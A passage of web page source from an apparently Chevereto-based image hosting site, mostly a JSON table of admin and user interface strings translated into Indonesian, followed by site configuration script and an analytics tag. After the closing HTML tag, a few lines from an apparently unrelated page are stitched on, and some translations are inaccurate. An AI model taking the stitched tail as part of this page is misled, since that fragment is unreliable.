want to allow non registered users to upload.":["Aktifkan ini jika anda mengizinkan pengguna tidak terdaftar menunggah."],"Enable this if you want to show embed codes when upload gets completed.":["Aktifkan ini jika anda ingin menampilkan kode sematkan ketika unggahan akan selesai."],"Redirect on single upload":["Arahkan pada unggahan tunggal"],"Enable this if you want to redirect to image page on single upload.":["Aktifkan ini jika anda ingin mengarahkan kembali ke halaman gambar pada unggahan tunggal."],"Enable duplicate uploads":["Nyalakan unggahan duplikat"],"Enable this if you want to allow duplicate uploads from the same IP within 24hrs. This setting doesn't affect administrators.":["Nyalakan ini jika anda ingin memperbolehkan unggahan duplikat dari alamat IP yang sama dalam 24 Jam. Pengaturan ini tidak mempengaruhi administrator."],"Enable expirable uploads":["Aktifkan upload berkadaluarsa"],"Enable this if you want to allow uploads with an automatic delete option.":["Nyalakan ini jika anda ingin memperbolehkan unggahan dengan sebuah opsi hapus otomatis."],"Auto delete guest uploads":["Hapus otomatis unggahan pengunjung"],"Enable this if you want to force guest uploads to be auto deleted after certain time.":["Nyalakan ini jika anda ingin memaksa unggahan pengunjung untuk dihapus otomatis setelah waktu tertentu."],"Maximum image size":["Ukuran maksimum gambar"],"Images greater than this size will get automatically downsized. Use zero (0) to don't set a limit.":["Gambar lebih besar dari ukuran ini akan secara otomatis diturunkan ukurannya. Gunakan Nol (0) untuk tidak menetapkan batas."],"Image Exif data":["Data Exif gambar"],"Keep":["Biarkan"],"Select the default setting for image <a %s>Exif data<\/a> on upload.":["Pilih pengaturan default untuk gambar <a %s>Exif data<\/a> pada ungguhan."],"Image Exif data (user setting)":["Data Exif gambar (pengaturan pengguna)"],"Enable this if you want to allow each user to configure how image Exif data will be handled.":["Aktifkan ini jika anda ingin membolehkan setiap pengguna mengatur bagaimana data Exif gambar akan ditangani."],"Maximum upload file size":["Ukuran unggah berkas maksimum"],"Maximum size allowed by server is %s. This limit is capped by %u and %p (%f values).":["Ukuran maksumum yang diperbolehkan serever adalah %s. Ukuran ini dibatasi oleh %u dan %p (nilai %f)."],"Image path":["Jalur gambar"],"Relative to Chevereto root":["Berhubungan ke akar Chevereto"],"Where to store the images? Relative to Chevereto root.":["Dimana harus menyimpan gambar? Tergantung pada akar Chevereto."],"Storage mode":["Mode penyimpanan"],"Datefolders":["Tanggalfolder"],"Direct":["Langsung"],"Datefolders creates %s structure":["Tanggalfolder membuat struktur %s"],"File naming method":["Metode penamaan berkas"],"Original":["Asli"],"Mix original + random":["Campur asli + acak"],"\"Original\" will try to keep the image source name while \"Random\" will generate a random name. \"ID\" will name the image just like the image ID.":["\"Asli\" akan mencoba menjaga nama sumber gambar sedangkan \"Acak\" akan menghasilkan sebuah nama acak. \"ID\" akan menamakan gambar seperti halnya ID gambar."],"Thumb size":["Ukuran Thumb"],"Watermarks":["Tanda air"],"Enable this to put a logo or anything you want in image uploads.":["Aktifkan ini untuk menempatkan sebuah logo atau apapun yang anda inginkan di upload gambar."],"Warning: Can't write in %s":["Peringatan: Tidak dapat menulis di %s"],"Enable watermark on admin uploads":["Aktifkan tanda air di unggahan admin"],"Enable watermark on GIF image uploads":["Aktifkan tanda air di unggahan gambar GIF"],"Minimum image size needed to apply watermark":["Ukuran gambar minimum dibutuhkan untuk menerapkan tanda air"],"Images smaller than this won't be watermarked. Use zero (0) to don't set a minimum image size limit.":["Gambar lebih kecil dari ini tidak akan diberikan tanda air. Gunakan nol (0) agar jangan menetapkan batas minimum ukuran gambar."],"Watermark image":["Gambar stempel"],"You will get best results with plain logos with drop shadow. You can use a large image if the file size is not that big (recommended max. is 16KB). Must be a PNG.":["Anda akan mendapatkan hasil terbaik dengan logo polos dengan bayangan jatuh. Anda dapat menggunakan sebuah gambar besar jika ukuran berkas tidak begitu besar (disarankan maks. adalah 16KB). Harus sebuah PNG."],"Watermark position":["Posisi stempel"],"left top":["kiri atas"],"left center":["kiri ke tengah"],"left bottom":["kiri bawah"],"center top":["tengah atas"],"center center":["pas tengah"],"center bottom":["tengah bawah"],"right top":["kanan atas"],"right center":["kanan tengah"],"right bottom":["kanan bawah"],"Relative position of the watermark image. First horizontal align then vertical align.":["Penyesuaian posisi stempel. Pertama mendatar selanjutnya tegak lurus."],"Watermark percentage":["Presentasi Tanda air"],"Watermark margin":["Jarak stempel"],"Watermark opacity":["Kegelapan tanda air"],"Opacity of the watermark in the final watermarked image. Values 0 to 100.":["kegelapan tanda air di gambar akhir yang diberi tanda air. Nilai antara 0 sampai 100."],"Dashboard > Settings > Website":["Dasbor > Pengaturan > Situs Web"],"Categories won't work when the explorer feature is turned off. To revert this setting go to %s.":["Kategori tidak akan bekerja ketika fitur penjelajah dimatikan. Untuk mengubah pengaturan ini pergilah ke %s."],"Do you really want to delete the %s category? This can't be undone.":["Apakah anda ingin menghapus kategori %s? Hal ini tidak dapat dibatalkan."],"Note: Deleting a category doesn't delete the images that belongs to that category.":["Catatan: Menghapus sebuah kategori tidak berarti menghapus gambar yang memiliki kategori tersebut."],"Edit category":["Ubah kategori"],"Expires":["Kadaluarsa"],"Do you really want to remove the ban to the IP %s? This can't be undone.":["Apakah anda yakin ingin menghapus larangan terhadap IP %s? Hal ini tidak dapat dibatalkan."],"Banned IP address will be forbidden to use the entire website.":["Alamat IP yang diblokir akan melarang penggunaan ke seluruh website."],"Edit IP ban":["Ubah larangan IP"],"Enable signups":["Aktifkan mendaftar"],"Enable this if you want to allow users to signup.":["Aktifkan ini jika anda ingin membolehkan pengguna untuk mendaftar."],"Minimum age required":["Usia minimum dibutuhkan"],"Empty":["Kosong"],"Leave it empty to don't require a minimum age to use the website.":["Biarkan kosong jika anda tidak memerlukan usia minimum untuk bisa menggunakan website."],"Require email confirmation":["Konfirmasi email dibutuhkan"],"Enable this if users must validate their email address on sign up.":["Aktifkan ini jika pengguna harus memvalidasi alamat email mereka untuk mendaftar."],"Shows a consent screen before accessing the website. Useful for adult content websites where minors shouldn't be allowed.":["Menampilkan sebuah layar persetujuan sebelum mengakses website. Sangat berguna untuk website konten dewasa dimana anak dibawah umur harusnya tidak diperbolehkan."],"Enable consent screen":["Aktifkan layar persetujuan"],"Notify to email":["Beritahu lewat surel"],"Minute limit":["Batas menitan"],"Hourly limit":["Batas jam-jam an"],"Daily limit":["Batas harian"],"Weekly limit":["Batas mingguan"],"Monthly limit":["Batas bulanan"],"Show not safe content in listings":["Perlihatkan isi yang tidak aman"],"Classic pagination":["Penomoran halaman klasik"],"What pagination method should be used.":["Metode penomoran apa yang harusnya digunakan."],"Image listing size":["Ukuran pendaftaran gambar"],"Fixed":["Tetap"],"Both methods use a fixed width but fluid method uses automatic heights.":["kedua metode menggunakan lebar tetap tapi metode tidak pasti menggunakan tinggi otomatis."],"Listing columns number":["Jumlah kolom pendaftaran"],"Here you can set how many columns are used based on each target device.":["Disini anda dapat mengatur berapa banyak kolom yang digunakan berdasarkan masing-masing target perangkat."],"Phone":["Selular"],"Phablet":["Phapblet"],"Tablet":["Tablet"],"Laptop":["Laptop"],"Desktop":["Desktop"],"theme editing":["penyuntingan tema"],"Put your themes in the %s folder":["Tempatkan tema anda di folder %s"],"Tone":["Suasana"],"Light":["Menyala"],"Dark":["Gelap"],"Main color":["Warna utama"],"Hexadecimal color value":["Nilai warna Heksadesimal"],"Use this to set the main theme color. Value must be in <a href=\"%s\" target=\"_blank\">hex format<\/a>.":["Gunakan ini untuk mengatur warna utama tema. Nila harus dalam <a href=\"%s\" target=\"_blank\">format hex<\/a>."],"Top bar color":["Warna bilah atas"],"Black":["Hitam"],"White":["Putih"],"If you set this to \"white\" the top bar and all the black tones will be changed to white tones.":["Jika anda mengatur ini ke \"putih\" bar diatas dan semua nada hitam akan berubah ke nada putih."],"Top bar button color":["Warna tombol bilah atas"],"Blue":["Biru"],"Green":["Hijau"],"Orange":["Oranye"],"Red":["Merah"],"Grey":["Abu-abu"],"Color for the top bar buttons like the \"Create account\" button.":["Warna untuk tombol bilah atas seperti halnya tombol \"Buat akun\"."],"Enable vector logo":["Aktifkan logo vektor"],"Enable vector logo for high quality logo in devices with high pixel density.":["Aktifkan logo vektor untuk logo berkualitas tinggi di perangkat dengan kepadatan piksel yang tinggi."],"Vector logo image":["Gambar logo vektor"],"Vector version or your website logo in SVG format.":["Versi vektor atau logo website dalam format SVG."],"Bitmap version or your website logo. PNG format is recommended.":["Versi bitmap atau logo situs web anda. Disarankan berformat PNG."],"Logo height":["Tinggi logo"],"No value":["Tidak ada nilai"],"Use this to set the logo height if needed.":["Gunakan ini untuk mengatur ketinggian logo jika diperlukan."],"Favicon image":["Gambar favicon"],"Favicon image. Image must have same width and height.":["Gambar favicon. Gambar harus memiliki lebar dan tinggi yang sama."],"Images greater than this size will show a button to load full resolution image.":["Gambar lebih besar dari ukuran ini akan ditampilkan sebagai sebuah tombol untuk ditampilkan dalam resolusi penuh."],"Enable download button":["Aktifkan tombol unduh"],"Enable this if you want to show the image download button.":["Aktifkan ini jika anda ingin menampilkan gambar dengan tombol unduh."],"Enable right click on image":["Aktifkan klik kanan pada gambar"],"Enable this if you want to allow right click on image viewer page.":["Aktifkan ini jika anda ingin membolehkan klik kanan pada halaman penampil gambar."],"Enable show Exif data":["Aktifkan untuk menampilkan data Exif"],"Enable this if you want to show image Exif data.":["Aktifkan ini jika anda ingin menampilkan data Exif gambar."],"Enable social share":["Aktifkan berbagi sosial"],"Enable this if you want to show social network buttons to share content.":["Aktifkan ini jika anda ingin menampilkan tombol jaringan sosial untuk membagikan konten."],"Enable embed codes (content)":["Aktifkan kode sematkan (konten)"],"Enable this if you want to show embed codes for the content.":["Aktifkan ini jika anda ingin menampilkan kode sematkan untuk konten."],"Not safe content checkbox in uploader":["Kotak centang konten tidak aman di pengunggah"],"Enable this if you want to show a checkbox to indicate not safe content upload.":["Nyalakan ini jika anda ingin menampilkan sebuah kotak centang untuk mengindikasikan unggahan konten tidak aman."],"Custom CSS code":["Kode CSS kustom"],"Put your custom CSS code here. It will be placed as <style> just before the closing <\/head> tag.":["Letakkan kode CSS kustom disini. Ini akan ditempatkan sebagai <style> tepat sebelum tag penutup <\/head>."],"Custom JS code":["Kode JS kustom"],"Put your custom JS code here. It will be placed as <script> just before the closing <\/head> tag.":["Letakkan kode JS kustom disini. Ini akan ditempatkan sebagai <style> tepat sebelum tag penutup <\/head>."],"Style":["Gaya"],"Landing page":["Halaman arahan"],"Split landing + images":["Halaman arahan + gambar"],"Route explore":["Menjelajah rute"],"Select the homepage style. To customize it further edit app\/themes\/%s\/views\/index.php":["Pilih gaya halaman muka. Untuk menyesuaikannya lanjut ubah app\/themes\/%s\/views\/index.php"],"Cover image":["Gambar sampul"],"Do you really want to delete this image? This can't be undone.":["Apakah anda yakin ingin menghapus gambar ini? Hal ini tidak dapat dimundurkan."],"Delete image":["Menghapus gambar"],"Add new cover image":["Tambah sebuah gambar sampul baru"],"Vector version or your website logo in SVG format (only for homepage).":["Versi vektor atau logo situs web dalam format SVG (hanya untuk halaman depan)"],"Bitmap version or your website logo (only for homepage). PNG format is recommended.":["Versi bitmap atau logo situs web anda ( hanya untuk halaman depan). Disarankan berformat PNG."],"This will be added inside the homepage %s tag. Leave it blank to use the default contents.":["ini akan ditambahkan kedalam tag halaman depan %s. Biarkan kosong untuk mengunakan konten default."],"Paragraph":["Paragraf"],"Open URL":["Buka URL"],"Enter an absolute or relative URL":["Masukkan sebuah URL absolut atau relatif"],"A relative URL like %r will be mapped to %l":["Sebuah URL relatif seperti %r akan dipetakan ke %l"],"User IDs":["ID Pengguna"],"banners":["banner"],"Automatic updates check":["Pemeriksaan pembaruan otomatis"],"When enabled the system will automatically check for new updates.":["ketika diaktifkan sistem akan secara otomatis memeriksa pembaruan yang ada."],"Display available updates notification":["Tampilkan notifikasi pembaruan yang tersedia"],"Enable this to show a notice on top warning you about new available system updates.":["Aktifkan untuk menampilkan sebuah pemberitahuan memperingatkan anda tentang pembaruan sistem yang ada."],"Minify code":["Sederhanakan koed"],"Enable this if you want to auto minify CSS and JS code.":["Aktifkan jika anda ingin secara otomatis mengecilkan kode CSS dan JS."],"Maintenance":["Perawatan"],"When enabled the website will show a maintenance message. This setting doesn't affect administrators.":["Ketika anda mengaktifkan website akan muncul sebuah pesan perawatan. Pengaturan ini tidak berpengaruh terhadap administrator."],"Crypt salt":["Crypt salt"],"PHP error reporting":["Pelaporan kesalahan PHP"],"Debug level":["Tingkat debug"],"None":["Tidaka ada"],"Error log":["log kesalahan"],"Print errors without error log":["Cetak kesalahan tanpa log kesalahan"],"Print and log errors":["Cetak dan log kesalahan"],"Routing allows you to customize default route binds on the fly. Only alphanumeric, hyphen and underscore characters are allowed. Check out our %s if you want to override or add new routes.":["Pengarahan memungkinkan anda mengkostumisasi pengikatan pengarahan dengan ceoat. Hanya karakter alfanumerik, tanda hubung dan garis bawah yang diperbolehkan. Periksa %s kami jika anda ingin membatalkan atau menambahkan pengarahan baru."],"Image routing":["Pengarahan Gambar"],"Routing for %s":["Pengarahan untuk %s"],"Album routing":["Pengarahan Album"],"Custom language strings":["string bahasa kustom"],"language strings":["string bahasa"],"Default language":["Bahasa default"],"Default base language to use.":["Bahasa dasar yang ingin digunakan."],"Auto language":["Bahasa otomatis"],"Enable this if you want to automatically detect and set the right language for each user.":["Aktifkan jika anda ingin secara otomatis mendeteksi dan mengatur bahasa yang tepat untuk setiap pengguna."],"Language chooser":["Pemilih bahasa"],"Enable this if you want to allow language selection.":["Mengatifkan ini jika anda ingin memperbolehkan pemilihan bahasa."],"Enabled languages":["Bahasa diaktifkan"],"Unchecked languages won't be used in your website.":["Bahasa yang tidak dicentang tidak akan digunakan di website anda."],"Toggle this to enable or disable HTTPS":["Alihkan ini untuk mengaktifkan atau menonaktifkan HTTPS"],"Toggle this to enable or disable this storage":["Alihkan ini jika ingin mengaktifkan atau menonaktifkan penyimpanan ini"],"Quota":["Kuota"],"Active":["Aktif"],"Storage method":["Metode penyimpanan"],"Local storage is used by default or when no external storage is active.":["Penyimpanan lokal akan digunakan secara default atau ketika tidak ada penyimpanan eksternal yang aktif."],"If you need help check the <a %s>storage documentation<\/a>.":["Jika anda memerlukan bantuan periksa <a %s>dokumentasi penyimpanan<\/a>."],"Edit storage":["Edit penyimpanan"],"From name":["Nama dari"],"Sender name for emails sent to users.":["Nama pengirim untuk email yang dikirim kepada pengguna."],"Email mode":["Mode email"],"How to send emails? SMTP recommended.":["Bagaimana cara pengiriman email? SMTP direkomendasikan."],"SMTP server and port":["Server dan port SMTP"],"SMTP server":["Server SMTP"],"SMTP username":["Username SMTP"],"SMTP password":["Password SMTP"],"SMTP security":["Keamanan SMTP"],"Unsecured":["Tidak aman"],"Send test email":["Kirim email percobaan"],"test@somedomain.com":["tes@sebuahdomain.com"],"Use this to test how your emails are being delivered. We recommend you to use %s.":["Gunakan ini untuk memeriksa apakan email sedang dikirimkan. Kami merekomendasikan anda untuk menggunakan %s."],"social networks":["jaringan sosial"],"You need a <a href=\"https:\/\/developers.facebook.com\/\" target=\"_blank\">Facebook app<\/a> for this.":["Anda memerlukan sebuah <a href=\"https:\/\/developers.facebook.com\/\" target=\"_blank\">Facebook app<\/a> untuk hal ini."],"Facebook app id":["id app Facebook"],"Facebook app secret":["Rahasia app Facebook"],"You need a <a href=\"https:\/\/apps.twitter.com\" target=\"_blank\">Twitter app<\/a> for this.":["Anda membutuhkan sebuah <a href=\"https:\/\/apps.twitter.com\" target=\"_blank\">Apliksi Twitter<\/a> untuk hal ini."],"Twitter API key":["Kunci API Twitter"],"Twitter API secret":["API rahasia Twitter"],"Twitter account":["Akun Twitter"],"You need a <a href=\"https:\/\/cloud.google.com\/console\" target=\"_blank\">Google app<\/a> for this.":["Anda membutuhkan sebuah<a href=\"https:\/\/cloud.google.com\/console\" target=\"_blank\">Google app<\/a> untuk hal ini."],"Google client id":["Id klien Google"],"Google client secret":["Rahasia klien Google"],"You need a <a href=\"http:\/\/vk.com\/dev\" target=\"_blank\">VK app<\/a> for this.":["Anda membutuhkan sebuah <a href=\"http:\/\/vk.com\/dev\" target=\"_blank\">VK app<\/a> untuk hal ini."],"VK client id":["id klien VK"],"VK client secret":["rahasia klien VK"],"You need a <a href=\"%s\" target=\"_blank\">reCAPTCHA key<\/a> for this.":["Anda memerlukan sebuah <a href=\"%s\" target=\"_blank\"> kunci reCAPTCHA<\/a> untuk hal ini."],"%s site key":["Kunci situs %s"],"%s secret key":["Kunci rahasia %s"],"reCAPTCHA threshold":["batas reCAPTCHA"],"How many failed attempts are needed to ask for reCAPTCHA? Use zero (0) to always show reCAPTCHA.":["Berapa kali percobaan yang diperbolehkan untuk meminta reCAPTCHA? Gunakan Nol (0) untuk selalu memperlihatkan reCAPTCHA."],"Comments API":["API Komentar"],"Disqus API works with %s.":["API Disqus bekerja dengan %s"],"Disqus shortname":["Nama pendek Disqus"],"%s public key":["Kunci publik %s"],"Comment code":["Kode komentar"],"Disqus, Facebook or anything you want. It will be used in image view.":["Disqus, Facebook atau apa pun yang Anda inginkan. Ini akan digunakan dalam tampilan gambar."],"Analytics code":["Kode analitik"],"Google Analytics or anything you want. It will be added to the theme footer.":["Google Analytics atau apa pun yang Anda inginkan. Ini akan ditambahkan dengan tema footer."],"For documentation about the API check the <a %s>API documentation<\/a>":["Untuk dokumentasi mengenai API periksa <a %s>Dokumentasi API<\/a>"],"API v1 key":["Kunci API V1"],"Use this key when using the <a %s>API v1<\/a>.":["Gunakan kunci ini ketika menggunakan <a %s>API v1<\/a>."],"Cookie law compliance":["Kesesuaian aturan kuki"],"Enable this to display a message that complies with the EU Cookie law requirements. Note: You only need this if your website is hosted in the EU and if you add tracking cookies.":["Aktifkan ini untuk menampilkan sebuah pesan yang sesuai dengan persyaratan hukum kuki Uni Eropa. Catatan: Anda hanya memerlukan hal ini jika website anda tersimpan di Uni Eropa dan jika anda menambahkan kuki pelacakan."],"Save changes":["Simpan perubahan"],"Check the errors to proceed.":["Periksa kesalahan untuk meneruskan proses."],"Play GIF":["Mainkan GIF"],"Load full resolution":["Muat resolusi penuh"],"Guest":["Tamu"],"Added to %a and categorized in %c":["Ditambahkan ke %a dan dikategorikan kedalam %c"],"Added to %s":["Ditambahkan ke %s"],"Uploaded to %s":["Diunggah ke %s"],"Uploaded %s":["Terunggah %s"],"Less Exif data":["Lihat sedikit data Exif"],"More Exif data":["Lihat banyak data Exif"],"Share image":["Bagikan gambar"],"Album ID":["ID album"],"In this album":["Di album ini"],"Upload and share your images.":["Unggah dan bagikan gambar anda."],"Drag and drop anywhere you want and start uploading your images now. %s limit. Direct image links, BBCode and HTML thumbnails.":["Tarik dan taruh dimanapun dan mulai unggah gambar anda sekarang. %s tersisa. Tautan gambar langsung, BBCode and sketsa HTML."],"Start uploading":["Mulai mengunggah"],"Fill this section uploading pictures to %s account.<br>You can edit the target user in your dashboard settings.":["Isi sesi pengunggahan gambar ini ke akun %s .<br>Anda dapat mengubah target pengguna di ruang kontrol."],"Sign up to unlock all the features":["Daftarlah untuk mendapatkan semua kelebihan yang ada"],"Manage your content, create private albums, customize your profile and more.":["Mengelola konten Anda, membuat album pribadi, menyesuaikan profil Anda dan banyak lagi."],"Enter your password":["Masukkan password anda"],"You have been logged off %s. Hope to see you soon.":["Anda telah keluar %s. Sampai bertemu kembali."],"Website under maintenance":["Website dalam perbaikan"],"We're performing scheduled maintenance tasks in the website. Please come back in a few minutes.":["Kami sedang melakukan perawatan rutin. Silakan kembali dalam beberapa menit lagi."],"This content is password protected.":["Konten ini dilindungi kata sandi."],"Please enter your password to continue.":["harap masukkan kata sandi anda untuk melanjutkan"],"Send":["Terkirim"],"You either don't have permission to access this page or the link has expired.":["Anda tidak diperkenankan memasuki halaman ini atau tautan telah tidak berlaku."],"Search results":["Hasil pencarian"],"Do you really want to delete this user? This can't be undone.":["Apakah anda yakin akan menghapus pengguna ini? Hal ini tidak dapat dimundurkan."],"Delete user":["Menghapus pengguna"],"Register date":["Tanggal pendaftaran"],"Registration IP":["Pendaftaran IP"],"Status":["Status"],"Valid":["Sah"],"Banned":["Diblokir"],"Awaiting email":["Menunggu email"],"Awaiting confirmation":["Menunggu konfirmasi"],"%i to %f characters<br>Letters, numbers and \"_\"":["%i sampai %f karankter<br>Huruf, angka dan \"_\""],"Auto delete uploads":["Hapus otomatis unggahan"],"This setting will apply to all your image uploads by default. You can override this setting on each upload.":["Pengaturan ini akan diterapkan ke semua gambar yang telah anda unggah secara default. Anda dapat mengubah pengaturan ini di setiap unggahan."],"Keep image <a %s>Exif data<\/a> on upload":["Biarkan <a %s>Exif data<\/a> gambar ketika upload"],"Newsletter":["Langganan berita"],"Send me emails with news about %s":["Kirimi saya email berita tentang %s"],"Content settings":["Pengaturan isi"],"Show not safe content in listings (from others)":["Perlihatkan berkas dewasa di daftar (dari yang lain)"],"Language":["Bahasa"],"Timezone":["Zona waktu"],"Current password":["Password saat ini"],"Enter your current password":["Masukkan password saat ini"],"New password":["Password baru"],"Confirm new password":["Konfirmasi password baru"],"Add a password to be able to login using your username or email.":["Ketik password untuk masuk menggunakan username atau email."],"This user doesn't have a password. Add one using this form.":["Pengguna ini tidak memiliki password. Tambahkan melalui form berikut."],"Re-enter your password":["Ketik ulang password"],"Upload new image":["Unggah gambar baru"],"Delete existing image":["Hapus gambar sekarang"],"Privacy":["Privasi"],"Make my profile and identity totally private":["Buat profil dan identitas saya sepenuhnya pribadi."],"Enable this if you want to act like an anonymous user":["Aktifkan jika anda ingin menjadi seperti pengguna anonim."],"This is your real name, not your username.":["Ini adalah nama anda bukan username."],"http:\/\/yourwebsite.com":["http:\/\/websitekamu.com"],"Bio":["Bio"],"Tell us a little bit about you":["Ceritakan sedikit mengenai anda"],"User has no connections.":["Pengguna tidak mempunyai koneksi."],"Link your account to external services to be able to login and share content.":["Sambungkan akun ke layanan luar untuk dapat masuk dan berbagi konten."],"Do you really want to disconnect %s from this account?":["Apakah anda yakin ingin diskonek %s dari akun ini?"],"This account is connected to %s":["Akun ini terhubung dengan %s"],"Do you really want to disconnect your %s account?":["Apakah anda yakin ingin memutuskan hubungan dengan akun %s ?"],"You will be logged out and you won't be able to login to your account using this %s account.":["Anda akan keluar dan tidak dapat masuk kembali ke akun anda menggunakan akun %s ini."],"Your account is connected to %s":["Akun anda terhubung dengan %s"],"disconnect":["terputus"],"Connect %s":["Menghubungkan dengan %s"],"Button":["Tombol"],"resend account activation":["Kirim ulang aktivasi akun"],"If you have already signed up maybe you need to request to %s":["Jika anda telah terdaftar mungkin anda perlu meminta ke %s"],"Upload profile background":["Unggah latar belakang untuk profil anda"],"Change background":["Ubah latar belakang"],"The profile background image will be deleted. This can't be undone. Are you sure that you want to delete the profile background image?":["Latar belakang profil akan dihapus. Tidak dapat dimundurkan. Apakah anda yakin untuk menghapus gambar latar belakang dari profil?"],"Delete background":["Menghapus latar belakang"],"Edit profile":["Ubah profil"],"Follower":["Pengikut"],"Follow":["Ikuti"],"Message sent":["Pesan terkirim"],"Contact":["Kontak"],"If you want to send a message fill the form below.":["Jika anda ingin mengirim sebuah pesan isi form dibawah ini."],"Your name":["Nama anda"],"Subject":["Judul"],"Installed version is v%s":["Versi terpasang ialah v%s"],"Can't connect to %s":["Tidak dapat terhubung ke %s"],"Last available release is v%s":["Rilis terakhir yang tersedia ialah v%s"],"Update needed, proceeding to download":["Pembaruan diperlukan, melanjutkan untuk mengunduh"],"No update needed":["Pembaruan tidak diperlukan"],"System files already up to date":["Sistem file telah terbaru"],"Starting v%s download":["Memulai unduhan v%s"],"Downloaded v%s, proceeding to extraction":["v%s terunduh, melanjutkan ekstraksi"],"Attempting to extract v%s":["Mencoba mengekstrak v%s"],"Extraction completed":["Ekstraksi selesai"],"Proceding to install the update":["Melanjutkan pemasangan pembaruan"],"Update failed":["Pembaruan gagal"],"Please provide a valid email address":["Harap sertakan email yang berlaku"],"You must enter the album name.":["Anada harus mengisi nama album."],"Confirm":["Konfirmasi"],"Select existing album":["Pilih album yang telah ada"],"Please select a valid image file type.":["Silakan pilih tipe berkas yang benar."],"Please select a picture of at most %s size.":["Silakan pilih gambar dengan ukuran %s ."],"Profile image updated.":["Gambar profil baru saja diperbaharui."],"Profile background image updated.":["Gambar latar belakang baru saja diperbaharui."],"Profile background image deleted.":["Gambar latar belakang baru saja dihapus."],"Error deleting profile background image.":["Gagal menghapus gambar latar belakang di profil."],"Update available v%s":["Pembaruan yang tersedia v%s"],"There is an update available for your system. You can automatic download and install this update or go to %s to proceed to download the file.":["Terdapat pembaruan untuk sistem anda. Anda dapat mengunduh otomatis dan memasang pembaruan ini atau pergi ke %s untuk melanjutkan mengunduh file."],"Update now":["Perbarui sekarang"],"Clipboard image":["Gambar papan klip"],"File too big.":["Berkas terlalu besar."],"Invalid or unsupported file format.":["Format berkas tidak valid atau tidak didukung."],"Some files couldn't be added":["Beberapa berkas tidak dapat ditambahkan."],"Image edited successfully.":["Gambar berhasil diubah."],"private":["pribadi"],"Album edited successfully.":["Album berhasil diubah."],"Invalid URL key.":["URL key tidak benar."],"Category URL key already being used.":["Kategori URL key telah digunakan."],"Category successfully deleted.":["Kategori berhasil dihapus."],"Category %s added.":["Kategori %s telah ditambahkan."],"Invalid expiration date.":["Tanggal kadaluarsa tidak benar."],"IP %s already banned.":["IP %s telah diblokir."],"IP %s banned.":["IP %s diblokir."],"IP ban successfully deleted.":["Larangan terhadap IP telah dihapus dari daftar."],"Please fill all the required fields.":["Silakan isi semua kolom yang dibutuhkan."],"Invalid storage capacity value. Make sure to use a valid format.":["Kapasitas penyimpanan tidak benar. Pastikan menggunakan bentuk yang baku."],"Invalid URL.":["URL tidak benar."],"Storage successfully edited.":["Kapasitas penyimpanan berhasil diubah."],"User added successfully.":["Nama pengguna berhasil ditambahkan."],"The content has been moved.":["Isi telah dipindahkan."],"Unselect":["Buang seleksi"],"The content has been edited.":["Isi telah diubah."],"All the changes that you have made will be lost if you continue.":["Semua perubahan yang dibuat akan hilang jika anda teruskan tindakan ini"],"Changes saved successfully.":["Perubahan telah disimpan"],"Go back to form":["Kembali ke formulir"],"continue anyway":["lanjutkan saja"],"Saving":["Sedang menyimpan"],"Sending":["Sedang mengirim"],"Confirm action":["Konfirmasi tindakan"],"information":["informasi"]}; 	if(typeof CHV == "undefined") { 		CHV = {obj: {}, fn: {}, str:{}}; 	} 	CHV.obj.vars = { 		urls: { 			home: PF.obj.config.base_url, 			search: "https://imgvia.com/search", 			login: "https://imgvia.com/login", 		} 	}; 	PF.obj.vars = $.extend({}, CHV.obj.vars); 	CHV.obj.config = { 		image : { 			max_filesize: "16 MB", 			right_click: true, 			load_max_filesize: "10 MB", 			max_width: "0", 			max_height: "0", 		}, 		upload: { 			redirect_single_upload: true, 			threads: "5", 			image_types: ["jpg","png","bmp","gif","jpeg"], 		}, 		user: { 			avatar_max_filesize: "1 MB", 			background_max_filesize: "5 MB", 		}, 		recaptcha: { 			enabled: false, 			sitekey: "", 		}, 		listing: { 			viewer: true, 		} 	}; 		CHV.obj.page_info = {"doctitle":"Imgvia - Free Image Hosting - H\u0131zl\u0131 Resim Y\u00fckle","pre_doctitle":"Imgvia","pos_doctitle":" - Free Image Hosting - H\u0131zl\u0131 Resim Y\u00fckle"}; 	 	}); </script>

<!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-136790064-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-136790064-1'); </script></body></html>
        <p>Hint: Look at the favicon</p>
        <p>(Accept Permissions)</p>
        <p><label><input type="checkbox" name="mirror" id="mirror" /> Mirror image</label></p>
    </body>

</html>
